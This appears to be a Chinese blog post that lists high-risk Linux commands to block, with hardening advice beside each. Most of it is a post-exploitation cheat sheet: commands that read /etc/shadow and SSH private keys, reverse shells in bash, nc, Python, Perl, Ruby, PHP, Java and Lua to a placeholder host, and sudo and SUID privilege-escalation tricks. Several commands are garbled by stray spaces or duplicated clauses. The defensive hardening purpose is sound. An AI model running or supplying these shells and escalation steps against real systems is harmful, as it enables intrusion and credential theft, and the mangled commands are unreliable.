【黑名单】高危命令汇总

含义命令修复建议
信息收集操作系统发行类型cat /etc/issue禁止cat,uname命令,业务不允许可限制文件/目录的访问
cat /etc/*-release
cat /etc/lsb-release
内核版本cat /proc/version
uname -a
uname -mrs
环境变量cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
应用与服务root正在运行哪些服务ps aux | grep root禁止cat,ls,ps命令
ps -ef | grep root
cat /etc/services
安装了哪些应用程序?他们是什么版本的?他们目前在运行吗?ls -alh /usr/bin/
ls -alh /sbin/ dpkg -l rpm -qa
ls -alh /var/cache/apt/archivesO 
ls -alh /var/cache/yum/
查看服务配置,是否有漏洞的插件cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/httpd/conf/httpd.conf
cat /etc/my.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/
是否有纯文本的密码用户名find . -name “*.python” -print0 | xargs -0 grep -i -n “var $password”
通讯与网络系统具有哪些NIC?它是否连接到另一个网络?/sbin/ifconfig -a禁止cat,iptables,ifconfig命令
cat /etc/network/interfaces
cat /etc/sysconfig/network
查看网络配置,DNS,网关cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks 
iptables -L hostname dnsdomainname
IP和/或MAC地址arp -e route /sbin/route -nee
机密信息和用户id禁止cat,id,whoami,who,last,grep,awk,ls命令
who
last
 List of userscat /etc/passwd | cut -d: -f1
List of super usersgrep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 { print $1}’
List of super usersawk -F: ‘($3 == “0”) {print}
cat /etc/sudoers
sudo -l
敏感主机密码文件cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
脚本,数据库,配置文件还是日志文件?密码的默认路径和位置cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
用户信息cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
私钥信息cat ~/.ssh/authorized_keys
cat ~/.ssh/identity
cat ~/.ssh/identity.pub
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
查找漏洞利用代码安装/支持的开发工具/语言find / -name perl*禁止find命令
find / -name python*
find / -name gcc*
find / -name cc
上传文件的方式find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
漏洞利用构造更强命令的交互bashpython -c ‘import pty;pty.spawn(“/bin/bash”)’1.禁止连接外网
2.禁止bash,sh命令
echo os.system(‘/bin/bash’)
/bin/sh -i
端口转发FPipe.exe -l 80 -r 80 -s 80 192.168.1.7业务允许条件下,禁止SSH,mknod,nc命令
sshssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
backpipemknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
反弹Shell的多种方式Bash反弹bash -i >& /dev/tcp/x.x.x.x/port 0>&11.禁止连接外网
2.禁止命令python,perl,ruby,lua,php,bash,telnet,rm,mknod,nc,mkfifo命令
telnet反弹telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p
nc(netcat)反弹nc -e /bin/bash x.x.x.x port
rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f
python脚本反弹python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“x.x.x.x”,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’
Perl脚本反弹perl -e ‘use Socket;$i=”x.x.x.x”;$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”x.x.x.x:5555″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
Ruby脚本反弹ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“x.x.x.x”,”5555″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e’f=TCPSocket.open(“x.x.x.x”,5555).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
php脚本反弹php -r ‘$sock=fsockopen(“x.x.x.x”,5555);exec(“/bin/bash -i <&3 >&3 2>&3”);’
java脚本反弹public class Revs {
    /**
    * @param args
    * @throws Exception
    */
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {“/bin/bash”,”-c”,”exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done”};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}
Lua脚本反弹lua -e “require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘x.x.x.x’,’5555′);os.execute(‘/bin/sh -i <&3 >&3 2>&3’);”
提权滥用SUDOfindsudo find / etc / passwd -exec / bin / sh \;禁止find
,Vim
,Nmap
,Man
,less
,more
,awk
,nano,wget,apache命令
Vimsudo vim -c’!sh’
Nmapsudo nmap-交互式nmap>!shsh-4.1#
Mansudo man man
lesssudo less / etc / hosts
moresudo more / etc / hosts
awksudo awk’BEGIN {system(“ / bin / sh”)}’
nanosudo nano / etc / passwd
wgetsudo wget http://192.168.56.1:8080/passwd -O / etc / passwd
apachesudo apache2 -f / etc / shadow
Suid和Guid配置错误查找SUID文件find / -perm -4000 -type f 2>/dev/null禁止find,cat,ls,base命令
查找root拥有的SUID文件find / -uid 0 -perm -4000 -type f 2>/dev/null
查找SGID文件(粘性位)find / -perm -2000 -type f 2>/dev/null
查找世界可写文件,不包括proc文件find / ! -path “/proc/“ -perm -2 -type f -print 2>/dev/null
查找您可以阅读的密钥或证书find / -type f ‘(‘ -name .cert -or -name .crt -or -name .pem -or -name .ca -or -name .p12 -or -name .cer -name .der ‘)’ ‘(‘ ‘(‘ -user support -perm -u=r ‘)’ -or ‘(‘ -group support -perm -g=r ‘)’ -or ‘(‘ -perm -o=r ‘)’ ‘)’ 2> /dev/null-or -name .cer -name *.der ‘)’ 2> /dev/null
查找rhost配置文件 find /home –name *.rhosts -print 2>/dev/null
查找hosts.equiv,列出权限并管理文件内容find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ;
显示当前用户历史记录cat ~/.bash_history
向当前用户分发各种历史文件ls -la ~/.*_history
检查当前用户的ssh文件ls -la ~/.ssh/
在/ etc中列出配置文件find /etc -maxdepth 1 -name ‘.conf’ -type f要么ls -la /etc/.conf
NFS权限弱哪些文件夹/文件系统导出到远程用户的配置和权限。cat / etc / exports

发表评论

电子邮件地址不会被公开。 必填项已用*标注